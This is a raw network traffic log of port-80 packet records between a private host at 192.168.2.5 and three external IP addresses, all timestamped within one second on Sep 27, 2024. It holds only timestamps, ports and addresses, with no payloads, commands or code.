Sep 27, 2024 04:21:17.039484024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039490938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039495945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039508104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039510012 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039515018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.039535046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.039556026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.042570114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042579889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042591095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042613029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.042634964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042644978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.042649984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042660952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042670012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.042673111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042685032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.042694092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.042721033 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.044235945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044246912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044260025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044275999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.044297934 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.044301033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044313908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044323921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044333935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.044337034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.044362068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.044389963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.066438913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066459894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066469908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066493034 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066509008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066512108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066519976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066530943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066540956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066549063 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066576958 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066585064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066596031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066612005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066618919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066647053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066668034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066704988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066709042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066720963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066730976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066740990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.066742897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066757917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.066780090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.078221083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078232050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078242064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078279018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078282118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.078289986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078303099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078316927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.078336954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.078522921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078532934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.078561068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.080364943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080404997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080411911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.080413103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080450058 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.080457926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080468893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080478907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080492020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080492973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.080513000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.080537081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.080589056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.080600023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080610991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080621004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080621958 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.080631971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080641031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.080657005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.080679893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.080703974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080717087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080727100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080737114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.080737114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.080754042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.080777884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.084819078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084830999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084841013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084866047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084876060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084876060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.084887028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084898949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084908962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.084913015 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085282087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085330009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085347891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085366011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085375071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085403919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085417032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085417032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085444927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085455894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085474014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.085494995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.086571932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086581945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086591959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086607933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.086612940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086626053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086635113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.086636066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086647987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086658001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.086664915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.086678982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.086702108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087198973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087212086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087220907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087235928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087249994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087249994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087260962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087270975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087281942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087285995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087294102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087307930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087332964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087464094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087472916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087496042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087518930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087558031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087568998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087584019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087590933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087605000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087606907 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087616920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087625980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087629080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087644100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087661028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087701082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087712049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087721109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087732077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087732077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087743998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087755919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087775946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087781906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087802887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.087811947 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.087836981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088486910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088499069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088505030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088532925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088581085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088593006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088603020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088613987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088614941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088640928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088651896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088663101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088664055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088674068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088686943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088690996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088702917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088726997 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088731050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088742018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088752031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.088768005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088778973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.088790894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.096249104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096261024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096271038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096287012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096297979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096302032 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.096309900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096324921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096328974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.096365929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.096380949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.096417904 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.114021063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114032030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114041090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114047050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114052057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114061117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114067078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114068985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114073038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114097118 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114129066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114135981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114161015 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114218950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114228010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114238024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114247084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114258051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114286900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114290953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114303112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114309072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114315033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114325047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114326000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114345074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114367962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114389896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114401102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114411116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114422083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114423990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114444017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114469051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114532948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114551067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114562035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114567995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114574909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114582062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114592075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114598036 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114604950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114614010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114617109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114630938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114650011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114675045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114686966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114696026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.114706993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.114732981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.121422052 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.121450901 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.121459961 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.121510983 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.121510983 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.121594906 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.121630907 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.121635914 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.121646881 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.121686935 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.121686935 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.121844053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.121885061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.121912956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.121922016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.121954918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.121983051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.121993065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122003078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122010946 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122029066 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122041941 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122060061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122071981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122091055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122098923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122100115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122109890 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122163057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122184038 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.122227907 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122239113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122247934 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122255087 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.122257948 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122267962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122277975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122296095 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.122311115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122359037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122370958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122380018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122381926 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.122385025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.122399092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122431040 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.122906923 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122935057 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122944117 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122955084 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.122967958 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.122982025 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122992992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.122994900 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.123028994 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.123028994 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.123404026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123414040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123423100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123433113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123441935 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123442888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123455048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123461962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.123466969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.123477936 CEST	80	49724	176.113.115.95	192.168.2.5
